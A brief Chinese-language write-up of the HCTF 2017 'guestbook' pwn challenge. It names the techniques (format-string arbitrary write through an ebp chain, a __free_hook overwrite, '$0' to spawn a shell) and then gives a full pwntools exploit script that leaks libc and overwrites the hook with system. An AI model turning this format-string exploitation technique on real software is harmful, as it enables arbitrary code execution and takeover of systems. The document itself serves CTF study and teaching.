2017HCTF-Writeupguestbook
作為第一道pwn,出的應該是比較老套簡單的東西。
主要考察點有三個。
利用ebp chain和fmt來實現任意地址寫。
對__free_hook的了解。
對$0get shell的了解(最后貌似無人使用,因為有其他方法。)
from pwn import *
context.log_level = 'debug'
context.terminal = ['terminator','-x','bash','-c']
bin = ELF('./guestbook')
libc = ELF('./libc.so')
def add(name,phone):
cn.sendline('1')
cn.recvuntil('OK,your guest index is ')
idx = int(cn.recvuntil('\\n'))
cn.recvuntil('?')
cn.send(name)
cn.recvuntil('?')
cn.send(phone)
cn.recvuntil('success!\\n')
return idx
def see(idx):
cn.sendline('2')
cn.recvuntil('index:')
cn.sendline(str(idx))
cn.recvuntil('the name:')
name = cn.recvuntil('\\n')
cn.recvuntil('the phone:')
phone = cn.recvuntil('\\n')
cn.recvuntil('===========')
return [name,phone]
def delete(idx):
cn.sendline('3')
cn.recvuntil('index:')
cn.sendline(str(idx))
def fmt(pay):
idx = add(pay,'1111')
see(idx)
delete(idx)
def fmt2(pay):
idx = add(pay,'1111')
see(idx)
def z():
gdb.attach(cn)
raw_input()
cn = process('./guestbook')
idx = add('%3$x','0')
libc_base = int(see(idx)[0],16)-71 - libc.symbols['_IO_2_1_stdout_']
free_hook = libc_base+0x001B38B0
system = libc_base + libc.symbols['system']
success('libc_base: '+hex(libc_base))
success('free_hook: '+hex(free_hook))
success('system: '+hex(system))
idx = add('%72$x','1')
ebp_2 = int(see(idx)[0],16)# %80$x
ebp_1 = ebp_2-0x20# %72$x
ebp_3 = ebp_2+0x20# %88$x
success('ebp_1: '+hex(ebp_1))
success('ebp_2: '+hex(ebp_2))
success('ebp_3: '+hex(ebp_3))
pay = '%'+str((ebp_3+8)&0xffff)+'c%80$hn'
fmt(pay)
pay = '%'+str((ebp_3+2)&0xffff)+'c%72$hn'
fmt(pay)
pay = '%'+str(((ebp_3+8)&0xffff0000)>>16)+'c%80$hn'
fmt(pay)
pay = '%'+str((ebp_3)&0xffff)+'c%72$hn'
fmt(pay)
pay = '%'+str(free_hook&0xffff)+'c%88$hn'
fmt(pay)
#z()
pay = '%'+str(system&0xffff)+'c%90$hn'
fmt2(pay)
pay = '%'+str((free_hook&0xffff)+2)+'c%88$hn'
fmt2(pay)
pay = '%'+str((system&0xffff0000)>>16)+'c%90$hn'
fmt2(pay)
idx=add('get shell','$0\\x00')
delete(idx)
cn.interactive()